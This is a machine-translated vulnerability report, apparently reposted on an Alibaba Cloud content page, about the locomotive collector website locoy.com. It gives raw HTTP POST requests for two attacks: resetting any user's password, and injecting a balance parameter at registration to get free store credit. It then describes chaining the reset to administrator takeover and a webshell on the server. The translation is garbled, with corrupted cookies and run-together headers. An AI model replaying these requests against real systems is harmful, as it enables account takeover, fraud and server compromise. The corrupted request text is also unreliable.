Getwebshell is available for two bugs on the locomotive collector website.

Source: Internet
Author: User

Getwebshell is available for two bugs on the locomotive collector website.

2. Code Design Issues.

1: Any user password change location http://www.locoy.com/member/getpwd.php

First, register the user. Then select "retrieve password". Enter the correct user name and the user's registered email address. The system sends the URL for password retrieval to the user's email address.

Like: http://www.locoy.com/member/getpwd.php? Action = getpwd & step = 4 & userid = [user id] & authstr = [32-bit password]

In this case, you can directly send a package and modify the POST parameter to reset any user password.

Host: www. locoy. comUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv: 37.0) Gecko/20100101 Firefox/37.0 Accept: text/html, application/xhtml + xml, application/xml; q = 0.9, */*; q = 0.8Accept-Language: zh-CN, zh; q = 0.8, en-US; q = 0.5, en; q = 0.3Accept-Encoding: gzip, deflateReferer: http://www.locoy.com/member/getpwd.php?action=getpwd&step=4&userid= [User id] & authstr = [32-bit password] Cookie: 800019423 slid = s0000_82_26 % 7C; 800019423mid = 89_26; 800019423mh = 1428728177141; 800019423is = 2; CNZZDATA5740700 = cnzz_eid % hour % 253A % 252F % hour % 252F % 26 ntime % 3D1428723746; pgv_pvi = 6005643264; hour = 31536000; DlqmrLfmUGusername = [hidden content]; pai_lasttime = 1428727989957; export _count = 0; pgv_si = s563043328; PHPSESSID = Hangzhou; 800019423 slid = s0000_409_57 % 7C; 800019423mid = 2017_16; 800019423mh = 1428728161450; signature = % u60A8 % u597D % uFF0C % u8FD9 % u91CC % u662F % u706B % signature % u91C7 % u96C6 % u5668 % signature % uFF0C % u8BF7 % u95EE % response % signature % u4E48 % u53EF % u4EE5 % u5E2E % u5230 % u60A8 % uFF1F % signature % u51FB % signature % u53EF % u8FDB % u884C % u804A % u5929; 800019423s0000_409_57 = 1428728161466 Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 163 name = [enter the user account you want to change the password here] & email = [original user email] & password = [password you want to set] & pwdconfirm = [Confirm password] & authstr = 7131195707e5a8da32a54d89047fa17b & userid = [hide content] & step = 4 & dosubmit = % CF % C2 % D2 % BB % B2 % BD



For details, see the http post package. After modifying the POST package, you can directly send the package to make the modification successful.
 





2: newly registered users can arbitrarily modify the user account balance vulnerability.

When registering and sending a package: Add a new parameter, that is, memberinfo [amount] = 10 new registered users have a balance of 10 yuan after registration. You can directly purchase the latest version of locomotive software in the mall.

POST/member/register. php HTTP/1.1 Host: www. locoy. comUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv: 37.0) Gecko/20100101 Firefox/37.0 Accept: text/html, application/xhtml + xml, application/xml; q = 0.9, */*; q = 0.8Accept-Language: zh-CN, zh; q = 0.8, en-US; q = 0.5, en; q = 0.3Accept-Encoding: gzip, deflateReferer: http://www.locoy.com/member/register.phpCookie : 800019423 slid = %% 7C; 800019423mid = 748_34; %= 1428728833832; %= 2; CNZZDATA5740700 = cnzz_eid % %%253a % 252F % %252f % 26 ntime % 3D1428723746; pgv_pvi = 6005643264; DlqmrLfmUGcookietime = 31536000; DlqmrLfmUGusername = [hidden content]; pai_lasttime = 1428727989957; pai_count = 0; pgv_si = s563043328; PHPSESSID = bytes; 800019423 slid = s0000_928_54 % 7cs1__592_82% 7cs1__213_92% 7C; 800019423mid = 214_57; 800019423mh = 1428728735214; 800019423is = 2; signature = % u60A8 % u597D % uFF0C % u8FD9 % u91CC % u662F % u706B % signature % u91C7 % u96C6 % u5668 % signature % uFF0C % u8BF7 % u95EE % response % signature % u4E48 % u53EF % u4EE5 % u5E2E % u5230 % u60A8 % uFF1F % u70B9 % u51FB % signature % u53EF % u8FDB % u884C % u804A % signature: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 246 memberinfo % 5 Busername % 5D = [hidden content] & memberinfo % 5 Bpassword % 5D = 123123 & pwdconfirm = 123123 & memberinfo % 5 Bemail % 5D = [hidden content] & checkcodestr = undeemed & memberinfo % 5 Bmodelid % 5D = [fill in any amount here] & memberinfo % 5 bamount % 5d = 10®Agreement = 1 & action = register & dosubmit = ++ % D7 % A2 ++ % B2 % E1 ++ & vundeemed = undeemed


 





Based on the first arbitrary password Modification Vulnerability, you can find several administrator accounts in bbs.locoy.com and reset their passwords. Then you can log on to the discuz 3.2 background.

Then getwebshell... the main site and BBS are on the same server. Then there is no more ....

 




 


 

Solution:

Enhanced Filtering

 

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.